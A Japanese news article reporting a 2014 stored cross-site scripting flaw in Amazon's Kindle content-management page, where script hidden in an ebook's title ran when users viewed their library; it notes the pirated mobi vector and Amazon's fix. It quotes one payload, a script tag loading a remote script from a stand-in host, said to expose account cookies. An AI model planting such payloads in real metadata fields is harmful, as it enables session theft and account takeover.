Kindleの電子書籍からAmazonアカウントをハッキング可能なことが判明

By Zhao !

Kindleの電子書籍に潜ませたスクリプトを使い、ユーザーのAmazonアカウントをハッキング可能であることが判明しました。

B.FL7.DE: Amazon.com Stored XSS via Book Metadata
http://b.fl7.de/2014/09/amazon-stored-xss-book-metadata.html

Your Amazon Account Can be Hacked via a Kindle eBook - The Digital Reader
http://the-digital-reader.com/2014/09/15/amazon-account-can-hacked-via-kindle-ebook/

セキュリティ研究者のレポートによると、Amazonが重大なセキュリティホールを抱えているのはKindleストア内の「アカウントサービス」ページにある「コンテンツおよびデバイスを管理」ページ。このセキュリティホールを使えばアタッカーはユーザーのAmazonアカウント情報を簡単に入手することが可能で、これはユーザーがダウンロードした電子書籍にハッキング用のスクリプトを埋め込んでおくことで可能になる、とのこと。

具体的な手順は、まず以下のようなコードを電子書籍のタイトル部分に埋め込んでおきます。

<script src=”「<https://www.example.org/script.js”></script>」>

ユーザーがこのスクリプトが埋め込まれた電子書籍をダウンロードし、自身のKindleライブラリーで電子書籍を開くとこのコードは実行されます。すると、アタッカーはユーザーのAmazonアカウントに関するクッキー情報にアクセス可能となる、というわけです。

実際に以下のような感じでアカウント情報が盗まれてしまう模様。

この脆弱性は基本的にKindleユーザー全般が被害に遭う可能性のあるものですが、実際に被害に遭っているのは海賊版の電子書籍を信頼できないソースからダウンロードし、「Kindleに送る」機能を使って読書をしているユーザーだったとのこと。

Amazon独自の「azw」フォーマットはこの脆弱性の影響を受けないそうですが、海賊版の電子書籍で頻繁に使用される「mobi」というファイルフォーマットは影響を受け、Kindleはこのファイルの読み込みが可能であるためハッキングを受ける可能性が出てくる、というわけです。

Kindleのアカウントページにポップアップウィンドウを表示する概念実証用のファイルも公開されていましたが、このセキュリティホールは2014年9月16日にAmazonが修復したとのことです。